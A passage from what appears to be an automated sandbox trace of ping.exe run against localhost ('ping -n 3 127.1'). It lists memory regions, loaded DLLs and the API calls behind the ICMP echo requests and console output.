-n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6937 start_va = 0x540000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6938 start_va = 0x560000 end_va = 0x561fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 6939 start_va = 0x570000 end_va = 0x57efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6940 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6941 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 6942 start_va = 0x600000 end_va = 0x603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 6943 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6944 start_va = 0x620000 end_va = 0x621fff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6945 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 6946 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6947 start_va = 0x7f480000 end_va = 0x7f4a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 6948 start_va = 0x7f4ab000 end_va = 0x7f4adfff entry_point = 0x0 region_type = private name = "private_0x000000007f4ab000" filename = "" Region: id = 6949 start_va = 0x7f4ae000 end_va = 0x7f4aefff entry_point = 0x0 region_type = private name = "private_0x000000007f4ae000" filename = "" Region: id = 6950 start_va = 0x7f4af000 end_va = 0x7f4affff entry_point = 0x0 region_type = private name = "private_0x000000007f4af000" filename = "" Region: id = 6951 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6952 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6953 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6954 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6955 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 6956 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6957 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6958 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6959 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6960 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 6961 start_va = 0x630000 end_va = 0x6adfff entry_point = 0x630000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6962 start_va = 0x7a0000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 6963 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6964 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6965 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6966 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6967 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6968 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6969 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6970 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6971 start_va = 0x7f380000 end_va = 0x7f47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f380000" filename = "" Region: id = 6972 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6973 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6974 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6975 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6976 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6977 start_va = 0x6c0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 6978 start_va = 0x700000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 6979 start_va = 0x7f4a8000 end_va = 0x7f4aafff entry_point = 0x0 region_type = private name = "private_0x000000007f4a8000" filename = "" Region: id = 6980 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6981 start_va = 0x560000 end_va = 0x562fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6982 start_va = 0x750000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 6983 start_va = 0x760000 end_va = 0x762fff entry_point = 0x760000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 6984 start_va = 0x8a0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 6985 start_va = 0x8e0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 6986 start_va = 0x7f4a5000 end_va = 0x7f4a7fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a5000" filename = "" Thread: id = 382 os_tid = 0xbec [0125.484] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0125.484] __set_app_type (_Type=0x1) [0125.484] __p__fmode () returned 0x76ea1768 [0125.484] __p__commode () returned 0x76ea176c [0125.484] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0125.484] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0125.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.486] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.486] _fileno (_File=0x76ea4c28) returned 1 [0125.486] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.486] GetFileType (hFile=0x28) returned 0x2 [0125.486] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff330 | out: lpMode=0x5ff330) returned 0 [0125.486] GetLastError () returned 0x6 [0125.486] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff294, nSize=0x50 | out: lpBuffer="䤐z") returned 0x0 [0125.486] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0125.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x5ff34c | out: phkResult=0x5ff34c*=0x88) returned 0x0 [0125.488] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x5ff340, lpData=0x5ff348, lpcbData=0x5ff344*=0x4 | out: lpType=0x5ff340*=0x0, lpData=0x5ff348*=0x0, lpcbData=0x5ff344*=0x4) returned 0x2 [0125.488] RegCloseKey (hKey=0x88) returned 0x0 [0125.488] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x5ff310*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5ff34c | out: ppResult=0x5ff34c*=0x7ac430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7a8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0125.488] FreeAddrInfoW (pAddrInfo=0x7ac430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7a8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0125.488] IcmpCreateFile () returned 0x7a6c98 [0125.491] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7ac228 [0125.491] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x7b5270 [0125.491] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5ff448, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0125.492] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="竈{ﴔ_┗\x94䰨盪❋") returned 0x14 [0125.493] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.493] GetFileType (hFile=0x28) returned 0x2 [0125.493] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0125.493] GetLastError () returned 0x6 [0125.493] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_❋") returned 0x0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0125.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.493] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x7b7b00 [0125.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x7b7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _write (in: _FileHandle=1, _Buf=0x7b7b00*, _MaxCharCount=0x14 | out: _Buf=0x7b7b00*) returned 20 [0125.493] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0125.493] LocalFree (hMem=0x7b7b00) returned 0x0 [0125.493] LocalFree (hMem=0x7b7ac8) returned 0x0 [0125.493] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="竈{ﴔ_▪\x94䰨盪❚") returned 0x18 [0125.493] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.493] GetFileType (hFile=0x28) returned 0x2 [0125.493] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0125.493] GetLastError () returned 0x6 [0125.493] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_❚") returned 0x0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0125.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0125.493] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x7ac1d8 [0125.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x7ac1d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _write (in: _FileHandle=1, _Buf=0x7ac1d8*, _MaxCharCount=0x18 | out: _Buf=0x7ac1d8*) returned 24 [0125.493] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.493] _fileno (_File=0x76ea4c28) returned 1 [0125.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0125.493] LocalFree (hMem=0x7ac1d8) returned 0x0 [0125.493] LocalFree (hMem=0x7b7ac8) returned 0x0 [0125.494] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0125.494] IcmpSendEcho2Ex (in: IcmpHandle=0x7a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7ac228, RequestSize=0x20, RequestOptions=0x5ff3bc, ReplyBuffer=0x7b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7b5270) returned 0x1 [0125.494] InetNtopW (in: Family=2, pAddr=0x5ff3ac, pStringBuf=0x5ff4d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0125.495] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="笰{ﴔ_⛔\x94䰨盪✣") returned 0x16 [0125.495] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.495] GetFileType (hFile=0x28) returned 0x2 [0125.495] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0125.495] GetLastError () returned 0x6 [0125.495] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✣") returned 0x0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.495] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7b7b68 [0125.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7b7b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _write (in: _FileHandle=1, _Buf=0x7b7b68*, _MaxCharCount=0x16 | out: _Buf=0x7b7b68*) returned 22 [0125.495] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.495] LocalFree (hMem=0x7b7b68) returned 0x0 [0125.495] LocalFree (hMem=0x7b7b30) returned 0x0 [0125.495] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="笰{ﴔ_⛿\x94䰨盪✼") returned 0x9 [0125.495] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.495] GetFileType (hFile=0x28) returned 0x2 [0125.495] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0125.495] GetLastError () returned 0x6 [0125.495] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✼") returned 0x0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0125.495] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0125.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0125.495] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.495] _fileno (_File=0x76ea4c28) returned 1 [0125.495] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.495] LocalFree (hMem=0x7a89a0) returned 0x0 [0125.495] LocalFree (hMem=0x7b7b30) returned 0x0 [0125.495] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5ff344, nSize=0x0, Arguments=0x5ff340 | out: lpBuffer="笰{ﴔ_➷\x94䰨盪✧") returned 0x9 [0125.496] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.496] GetFileType (hFile=0x28) returned 0x2 [0125.496] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff308 | out: lpMode=0x5ff308) returned 0 [0125.496] GetLastError () returned 0x6 [0125.496] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff26c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0125.496] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a8a00 [0125.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7a8a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _write (in: _FileHandle=1, _Buf=0x7a8a00*, _MaxCharCount=0x9 | out: _Buf=0x7a8a00*) returned 9 [0125.496] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0125.496] LocalFree (hMem=0x7a8a00) returned 0x0 [0125.496] LocalFree (hMem=0x7b7b30) returned 0x0 [0125.496] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="笰{ﴔ_⟘\x94䰨盪✨") returned 0x9 [0125.496] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.496] GetFileType (hFile=0x28) returned 0x2 [0125.496] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0125.496] GetLastError () returned 0x6 [0125.496] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✨") returned 0x0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0125.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0125.496] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0125.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0125.496] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0125.496] _fileno (_File=0x76ea4c28) returned 1 [0125.496] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0125.496] LocalFree (hMem=0x7a89a0) returned 0x0 [0125.496] LocalFree (hMem=0x7b7b30) returned 0x0 [0125.496] Sleep (dwMilliseconds=0x3e8) [0126.505] IcmpSendEcho2Ex (in: IcmpHandle=0x7a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7ac228, RequestSize=0x20, RequestOptions=0x5ff3bc, ReplyBuffer=0x7b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7b5270) returned 0x1 [0126.506] InetNtopW (in: Family=2, pAddr=0x5ff3ac, pStringBuf=0x5ff4d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0126.506] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⛔\x94䰨盪✣") returned 0x16 [0126.506] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.506] _fileno (_File=0x76ea4c28) returned 1 [0126.506] _get_osfhandle (_FileHandle=1) returned 0x28 [0126.506] GetFileType (hFile=0x28) returned 0x2 [0126.506] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0126.506] GetLastError () returned 0x6 [0126.506] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✣") returned 0x0 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.507] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0126.507] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7b7fd8 [0126.507] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7b7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _write (in: _FileHandle=1, _Buf=0x7b7fd8*, _MaxCharCount=0x16 | out: _Buf=0x7b7fd8*) returned 22 [0126.507] fflush (in: 